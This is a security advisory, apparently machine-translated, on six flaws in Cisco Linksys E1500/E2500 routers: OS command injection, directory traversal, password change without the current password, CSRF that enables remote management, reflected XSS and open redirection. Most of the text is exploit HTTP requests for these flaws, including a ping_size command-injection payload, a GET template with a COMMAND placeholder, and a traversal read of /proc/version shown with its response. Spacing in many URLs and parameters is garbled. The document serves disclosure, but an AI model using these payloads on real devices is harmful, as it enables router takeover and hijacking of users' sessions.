Multiple security vulnerabilities in Cisco Linksys E1500/E2500 Routers

Release date:
Updated on: 2013-02-19

Affected Systems:
Cisco Linksys E1500 1.0.05-build 1
Cisco Linksys E1500 1.0.04-build 2
Cisco Linksys E1500 1.0.00-build 9
Cisco Linksys E2500 1.0.03
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57760
 
Cisco Linksys E1500/E2500 is a wireless N router using SpeedBoost technology.
 
Linksys E1500/E2500 has the Command Injection Vulnerability, Security Bypass Vulnerability, Cross-Site Request Forgery Vulnerability, cross-site scripting vulnerability, directory traversal vulnerability, and URI Redirection Vulnerability. Attackers can exploit these vulnerabilities to execute arbitrary commands, phishing attacks, bypass security restrictions, steal cookies, access the system and other configuration files, and perform unauthorized operations in the user session context.
 
1. OS command injection.
Parameter: ping_size = % 26 ping % 20192% 2e168% 2e178% 2e102% 26
This vulnerability is caused by missing input verification for the ping_size parameter.
2. directory traversal.
Parameter: next_page
3. Change the old password without entering the current password.
4. The CSRF vulnerability allows you to change the password without having to know the current password. Attackers can activate remote management.
5. reflected Cross-Site Script Execution.
Parameter: wait_time = 3' % 3 balert ('pwnd ')//
6. Redirection Vulnerability
Parameter: submit_button = http://www.pwnd.pwnd % 0a
 
<* Source: Michael Messner (michae.messner@integralis.com)

Link: http://www.s3cur1ty.de/node/655
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Michael Messner (michae.messner@integralis.com) provides the following test methods:
 
=========== Vulnerability Overview: ======================
 
OS Command Injection/E1500 and E2500 v1.0.03
=> Parameter: ping_size = % 26 ping % 20192% 2e168% 2e178% 2e102% 26
 
The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. it is possible to start a telnetd or upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.
 
Example Exploit:
POST/apply. cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: de-de, de; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http: // 192.168.178.199/Diagnostics. asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Connection: close
 
Submit_button = Diagnostics & change_action = Success & submit_type = start_ping & action = & commit = 0 & ping_ip = 1.1.1.1 & ping_size = % 26 ping % 20192% 2e168% 2e178% 2e102% 26 & ping_times 5 & traceroute_ip =
Change the request methode from HTTP Post to http get makes the exploitation easier:
 
Http: // 192.168.178.199/apply. cgi? Submit_button = Diagnostics & change_action = gozila_cgi & submit_type = start_ping & action = & commit = 0 & ping_ip = 1.1.1.1 & ping_size = % 26 COMMAND % 26 & ping_times = 5 & traceroute_ip =
 

Directory traversal-tested on E1500:
=> Parameter: next_page
 
Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.
 
Request:
POST/apply. cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 16.0) Gecko/20100101 Firefox/16.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: de-de, de; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http: // 192.168.178.199/Wireless_Basic.asp
Authorization: Basic YWRtaW46YWRtaW4 =
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
 
Submit_type = wsc_method2 & change_action = gozila_cgi & next_page =.../../proc/version
Response:
HTTP/1.1 200 OK
Server: httpd
Date: Thu, 01 Jan 1970 00:00:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close
 
Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012
 

For changing the current password there is no request of the current password-tested on E1500
With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
 
Example Request:
POST/apply. cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 16.0) Gecko/20100101 Firefox/16.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: de-de, de; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http: // 192.168.1.1/Management. asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 311
 
Submit_button = Management & change_action = & action = Apply & PasswdModify = 1 & http_enable = 1 & https_enable = 0 & Strong = 0 & wait_time = 4 & need_reboot = 0 & http_passwd = admin & http_passwdConfirm = admin & _ http_enable = 1 & web_wl_filter = 0 & remote_management = 0 & nf_alg_sip = 0 & upnp_enable = 1 & upnp_config = 1 & upnp_internet_dis = 0
CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management-tested on E1500:
Http: // <IP>/apply. cgi? Submit_button = Management & change_action = & action = Apply & PasswdModify = 1 & http_enable = 1 & https_enable = 0 & Strong = 0 & wait_time = 4 & need_reboot = 0 & http_passwd = password1 & Signature = password1 & _ http_enable = 1 & web_wl_filter = 0 & remote_management = 1 & _ remote_mgt_https = 1 & remote_upgrade = 0 & Authorization = 1 & http_wanport = 8080 & nf_alg_sip = 0 & upnp_enable = 1 & upnp_config = 1 & upnp_internet_dis = 0
Reflected Cross Site Scripting-tested on E1500
=> Parameter: wait_time = 3' % 3 balert ('pwnd ')//
 
Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.
 
Example Exploit:
POST/apply. cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 16.0) Gecko/20100101 Firefox/16.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: de-de, de; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http: // 192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 300
 
Submit_button = Wireless_Basic & action = Apply & submit_type = & change_action = & next_page = & commit = 1 & quota = none & channel_24g = 0 & nbw_24g = 20 & wait_time = 3' % 3 balert ('pwnd ') // & guest_ssid = Cisco-guest & wsc_security_mode = & wsc_smode = 1 & Strong = mixed & ssid_24g = Cisco & _ wl0_nbw = 20 & _ wl0_channel = 0 & closed_24g = 0
 

Redirection-tested on E1500
=> Paramter: submit_button = http://www.pwnd.pwnd % 0a
 
Injecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input.
 
Example Exploit:
POST/apply. cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 16.0) Gecko/20100101 Firefox/16.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: de-de, de; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http: // 192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 290
 
Submit_button = http://www.pwnd.pwnd % 0a & action = Apply & submit_type = & change_action = & next_page = & commit = 1 & quota = none & channel_24g = 0 & nbw_24g = 20 & wait_time = 3 & guest_ssid = Cisco01589-guest & wsc_security_mode = & wsc_smode = 1 & net_mode_24g = mixed & ssid_24g = Cisco01589 & _ wl0_nbw = 20 & _ wl0_channel = 0 & closed_24g = 0

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Cisco
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://tools.cisco.com/security/center/home.x